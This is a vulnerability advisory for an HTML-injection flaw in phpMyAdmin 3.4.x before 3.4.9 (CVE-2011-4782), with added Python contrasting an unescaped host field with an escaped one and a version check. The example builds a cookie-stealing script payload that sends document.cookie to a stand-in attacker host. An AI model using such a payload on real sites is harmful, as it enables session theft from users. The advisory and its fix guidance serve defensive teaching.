phpMyAdmin '$host' Variable HTML Injection Vulnerability
BID:51166
Info
| Bugtraq ID: | 51166 |
| Class: | Input Validation Error |
| CVE: | CVE-2011-4782 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 22 2011 12:00AM |
| Updated: | Apr 13 2015 10:25PM |
| Credit: | Jason Leyrer of Trustwave SpiderLabs |
| Vulnerable: | phpMyAdmin 3.4.8, 3.4.6, 3.4.5, 3.4.4, 3.4.3.2, 3.4.3.1, 3.4.3, 3.4.1, 3.4.0, 3.4.0-beta1; MandrakeSoft Enterprise Server 5; MandrakeSoft Enterprise Server 5 x86_64; Gentoo Linux |
| Not Vulnerable: | phpMyAdmin 3.4.9 |
Discussion
phpMyAdmin is prone to an HTML-injection vulnerability because it fails to sanitize the user-supplied '$host' value before including it in generated page content.
Attacker-supplied HTML and script code is rendered in the victim's browser in the context of the affected phpMyAdmin site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
phpMyAdmin versions 3.4.x prior to 3.4.9 are affected.
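The following is an added example, not phpMyAdmin's code or the PoC from the advisory. It shows the bug class in miniature: a host value interpolated straight into markup (the sink), the same rendering with the value escaped (the fix class; PHP's htmlspecialchars() does the equivalent job), a check that the injected tag no longer survives, and a version test for the affected range stated above (3.4.x before 3.4.9) that copes with the four-part and beta version strings listed in this advisory. The HTML fragment, the payload and the function names are all constructed for illustration.

```python
# Added example (not phpMyAdmin code). Demonstrates an HTML-injection sink versus
# its escaped form, plus a version check for the advisory's affected range.
import html
import re


def render_host_vulnerable(host: str) -> str:
    """Interpolates the user-controlled value directly into markup: the bug class."""
    return f"<td>Host: {host}</td>"


def render_host_fixed(host: str) -> str:
    """Escapes the value before interpolation; PHP's htmlspecialchars($host) is the analogue."""
    return f"<td>Host: {html.escape(host, quote=True)}</td>"


def contains_markup(fragment: str, tag: str = "script") -> bool:
    """Crude regression check: does a rendered fragment still contain a live <tag>?"""
    return re.search(rf"<\s*{re.escape(tag)}\b", fragment, re.IGNORECASE) is not None


def parse_version(version: str) -> tuple:
    """Turn '3.4.3.2' or '3.4.0-beta1' into a comparable tuple.

    Numeric parts are padded to four positions; a pre-release suffix such as
    '-beta1' sorts below the final release with the same numbers.
    """
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:-([a-z]+)(\d*))?", version.strip().lower())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums = nums + (0,) * (4 - len(nums))
    # (0, name, n) for a pre-release, (1, "", 0) for a final release
    pre = (0, m.group(2), int(m.group(3) or 0)) if m.group(2) else (1, "", 0)
    return nums + pre


def is_affected(version: str) -> bool:
    """True for any 3.4.x release older than 3.4.9, the range this advisory gives."""
    v = parse_version(version)
    return v[:2] == (3, 4) and v < parse_version("3.4.9")


if __name__ == "__main__":
    # Constructed payload of the kind the discussion above warns about
    # (cookie theft); attacker.invalid is a reserved, non-resolving name.
    payload = '<script>location="http://attacker.invalid/?c="+document.cookie</script>'
    print("vulnerable:", render_host_vulnerable(payload))
    print("fixed:     ", render_host_fixed(payload))
    for ver in ("3.4.0-beta1", "3.4.3.2", "3.4.8", "3.4.9", "3.5.0"):
        print(ver, "affected" if is_affected(ver) else "not affected")
```

Escaping at the output point (rather than trying to strip tags on input) is the right fix for this class: the host value is still stored and displayed faithfully, but the browser never parses it as markup.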
Exploit / POC
Attackers can exploit this issue using a web browser; no exploit code is required.
Solution / Fix
Solution:
Updates are available. Please see the references for more information. phpMyAdmin 3.4.9 corrects the issue; after updating, confirm that the installed version is 3.4.9 or later.
MandrakeSoft Enterprise Server 5
- Mandriva phpmyadmin-3.4.9-0.1mdvmes5.2.noarch.rpm
  http://www.mandriva.com/en/downloads/
MandrakeSoft Enterprise Server 5 x86_64
- Mandriva phpmyadmin-3.4.9-0.1mdvmes5.2.noarch.rpm
  http://www.mandriva.com/en/downloads/
References
References:
- Cross-Site Scripting Vulnerability in phpMyAdmin (Trustwave SpiderLabs)
- phpMyAdmin Homepage (phpMyAdmin)
- PMASA-2011-19 (phpMyAdmin)